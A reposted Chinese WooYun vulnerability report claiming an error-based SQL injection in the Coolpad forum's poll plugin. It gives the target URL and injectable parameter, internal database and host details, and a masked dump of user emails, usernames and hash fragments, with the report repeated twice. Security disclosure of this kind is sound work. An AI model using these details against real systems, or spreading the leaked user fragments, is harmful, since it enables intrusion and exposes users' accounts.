记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

酷派论坛高危注可导致全网用户泄露

2015-02-24 21:40

http://bbs.coolpad.com/poll/

1111.png



酷派使用了discuz的xplus插件,主要功能是投票

开始构造url。然后尝试注入。。

根据自己搭建的结果,构造如下

code 区域
http://bbs.coolpad.com/poll/poll.php?action=viewVoters&id=4&choiceId=31



choiceid存在注入

code 区域
Target: http://bbs.coolpad.com/poll/poll.php?action=viewVoters&id=4&choiceId=31

Host IP:58.220.6.144

Web Server: nginx

DB Server: MySQL

Resp. Time(avg):378 ms

Current User: coolpad_poll@192.168.0.11

Sql Version: 5.6.15-log

Current DB: coolpad_poll

System User: coolpad_poll@192.168.0.11

Host Name: coolyun-50-20

Installation dir: \/usr\/coolpad\/Percona-Server-5.6.15-rel63.0

DB User: 'coolpad_poll'@'192.168.0.11'

Data Bases: information_schema

coolpad_poll

test



鉴于xplus用户数据适合discuz数据联通的,并且酷派论坛数据是好酷云主库联通的,可导致全网用户泄露

由于是error based注入,所以脱裤没压力

mask 区域
*****d: ui*****

**********

*****=bbs@kefu*****

**********

*****sername*****

**********

*****0f3c10bfb4921*****

**********

***** uid=1*****

**********

*****=wyd68@vi*****

**********

*****sername*****

**********

*****696018d26c305*****

**********

***** uid=1*****

**********

*****=fred.sun*****

**********

*****sername*****

**********

*****a9a28672f6c07*****

**********

***** uid=1*****

**********

*****=winny997*****

**********

*****sername*****

**********

*****3231004414094*****

**********

***** uid=1*****

**********

*****il=mark7*****

**********

*****sername*****

**********

*****b680c59bbd5ba*****

**********

***** uid=1*****

**********

*****erwengjuche*****

**********

*****rname=we*****

**********

*****1438934ff84df*****

**********

***** uid=1*****

**********

*****il=ryyf@*****

**********

***** usern*****

**********

*****4be28a9c0554c*****

**********

***** uid=1*****

**********

*****=85890569*****

**********

*****sername*****

**********

*****e4b7d54d825a6*****

**********

***** uid=1*****

**********

*****mail=fz*****

**********

*****e=\u771f\u*****

**********

*****3d2e2f69585a3*****

**********

***** uid=1*****

**********

*****=12410240*****

**********

*****sername*****

**********

*****488c6f1f6607f*****

**********

***** uid=1*****

**********

*****=zhenhao8*****

**********

*****rname=zh*****

**********

*****93f9b7e529dc1*****

**********

***** uid=1*****

**********

*****il=cnoco*****

**********

*****rname=15*****

**********

*****09ca9871d98e4*****

**********

***** uid=1*****

**********

*****=xs060025*****

**********

*****rname=an*****

**********

*****a48719b4f3477*****

**********

***** uid=1*****

**********

*****=53079414*****

**********

*****ame=angel*****

**********

*****adfbc02567388*****

**********

***** uid=1*****

**********

*****il=seko2*****

**********

*****sername*****

**********

*****1772f8dfb7635*****

**********

***** uid=1*****

**********

*****il=13256*****

**********

*****rname=to*****

**********

*****767a9ed57c808*****

**********

***** uid=1*****

**********

*****il=hhboy*****

**********

***** usern*****

**********

*****d1b695060bc63*****

**********

***** uid=1*****

**********

*****=tsfj_881*****

**********

***** usern*****

**********

*****055dbf81fc657*****

**********

***** uid=1*****

**********

*****=li810330*****

**********

*****sername*****

**********

*****c3010d0fb2463*****

**********

***** uid=1*****

**********

*****il=zztel*****

**********

*****sername*****

**********

*****6adb2154c40f2*****

**********

***** uid=1*****

**********

*****=51494104*****

**********

*****ame=\u917*****

**********

*****66e4885017a00*****

**********

***** uid=1*****

**********

*****il=0001s*****

**********

*****sername*****

**********

*****156430e51cb85*****

**********

***** uid=1*****

**********

*****=27292334*****

**********

*****sername*****

**********

*****1f18c4c2d862c*****

**********

***** uid=1*****

**********

*****il=czjna*****

**********

*****sername*****

**********

*****f16d5a30cac32*****

**********

***** uid=1*****

**********

*****il=wxkno*****

**********

*****sername*****

**********

*****e95d45a6ffb92*****

**********

***** uid=1*****

**********

*****il=zs966*****

**********

*****sername*****

**********

*****8f4647b8e8ac2*****

**********

***** uid=1*****

**********

*****=13378387*****

**********

*****sername*****

**********

*****246ce51754fc7*****

**********

***** uid=1*****

**********

*****=lhf51729*****

**********

*****e=\u5389\u*****

**********

*****ebe6d32222eb2*****

**********

***** uid=1*****

**********

*****il=doxin*****

**********

*****rname=do*****

**********

*****c52a7d7b54e03*****

**********

***** uid=1*****

*****。</*****

*****觉停了*****

*****多*****

*****) from coolpad_po*****

**********

*****ult: *****

漏洞证明:

code 区域
http://bbs.coolpad.com/poll/poll.php?action=viewVoters&id=4&choiceId=31



choiceid存在注入

code 区域
Target: http://bbs.coolpad.com/poll/poll.php?action=viewVoters&id=4&choiceId=31

Host IP:58.220.6.144

Web Server: nginx

DB Server: MySQL

Resp. Time(avg):378 ms

Current User: coolpad_poll@192.168.0.11

Sql Version: 5.6.15-log

Current DB: coolpad_poll

System User: coolpad_poll@192.168.0.11

Host Name: coolyun-50-20

Installation dir: \/usr\/coolpad\/Percona-Server-5.6.15-rel63.0

DB User: 'coolpad_poll'@'192.168.0.11'

Data Bases: information_schema

coolpad_poll

test



mask 区域
*****d: ui*****

**********

*****=bbs@kefu*****

**********

*****sername*****

**********

*****0f3c10bfb4921*****

**********

***** uid=1*****

**********

*****=wyd68@vi*****

**********

*****sername*****

**********

*****696018d26c305*****

**********

***** uid=1*****

**********

*****=fred.sun*****

**********

*****sername*****

**********

*****a9a28672f6c07*****

**********

***** uid=1*****

**********

*****=winny997*****

**********

*****sername*****

**********

*****3231004414094*****

**********

***** uid=1*****

**********

*****il=mark7*****

**********

*****sername*****

**********

*****b680c59bbd5ba*****

**********

***** uid=1*****

**********

*****erwengjuche*****

**********

*****rname=we*****

**********

*****1438934ff84df*****

**********

***** uid=1*****

**********

*****il=ryyf@*****

**********

***** usern*****

**********

*****4be28a9c0554c*****

**********

***** uid=1*****

**********

*****=85890569*****

**********

*****sername*****

**********

*****e4b7d54d825a6*****

**********

***** uid=1*****

**********

*****mail=fz*****

**********

*****e=\u771f\u*****

**********

*****3d2e2f69585a3*****

**********

***** uid=1*****

**********

*****=12410240*****

**********

*****sername*****

**********

*****488c6f1f6607f*****

**********

***** uid=1*****

**********

*****=zhenhao8*****

**********

*****rname=zh*****

**********

*****93f9b7e529dc1*****

**********

***** uid=1*****

**********

*****il=cnoco*****

**********

*****rname=15*****

**********

*****09ca9871d98e4*****

**********

***** uid=1*****

**********

*****=xs060025*****

**********

*****rname=an*****

**********

*****a48719b4f3477*****

**********

***** uid=1*****

**********

*****=53079414*****

**********

*****ame=angel*****

**********

*****adfbc02567388*****

**********

***** uid=1*****

**********

*****il=seko2*****

**********

*****sername*****

**********

*****1772f8dfb7635*****

**********

***** uid=1*****

**********

*****il=13256*****

**********

*****rname=to*****

**********

*****767a9ed57c808*****

**********

***** uid=1*****

**********

*****il=hhboy*****

**********

***** usern*****

**********

*****d1b695060bc63*****

**********

***** uid=1*****

**********

*****=tsfj_881*****

**********

***** usern*****

**********

*****055dbf81fc657*****

**********

***** uid=1*****

**********

*****=li810330*****

**********

*****sername*****

**********

*****c3010d0fb2463*****

**********

***** uid=1*****

**********

*****il=zztel*****

**********

*****sername*****

**********

*****6adb2154c40f2*****

**********

***** uid=1*****

**********

*****=51494104*****

**********

*****ame=\u917*****

**********

*****66e4885017a00*****

**********

***** uid=1*****

**********

*****il=0001s*****

**********

*****sername*****

**********

*****156430e51cb85*****

**********

***** uid=1*****

**********

*****=27292334*****

**********

*****sername*****

**********

*****1f18c4c2d862c*****

**********

***** uid=1*****

**********

*****il=czjna*****

**********

*****sername*****

**********

*****f16d5a30cac32*****

**********

***** uid=1*****

**********

*****il=wxkno*****

**********

*****sername*****

**********

*****e95d45a6ffb92*****

**********

***** uid=1*****

**********

*****il=zs966*****

**********

*****sername*****

**********

*****8f4647b8e8ac2*****

**********

***** uid=1*****

**********

*****=13378387*****

**********

*****sername*****

**********

*****246ce51754fc7*****

**********

***** uid=1*****

**********

*****=lhf51729*****

**********

*****e=\u5389\u*****

**********

*****ebe6d32222eb2*****

**********

***** uid=1*****

**********

*****il=doxin*****

**********

*****rname=do*****

**********

*****c52a7d7b54e03*****

**********

***** uid=1*****

修复方案:


知识来源: www.wooyun.org/bugs/wooyun-2015-091021

阅读:133662 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“酷派论坛高危注可导致全网用户泄露”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云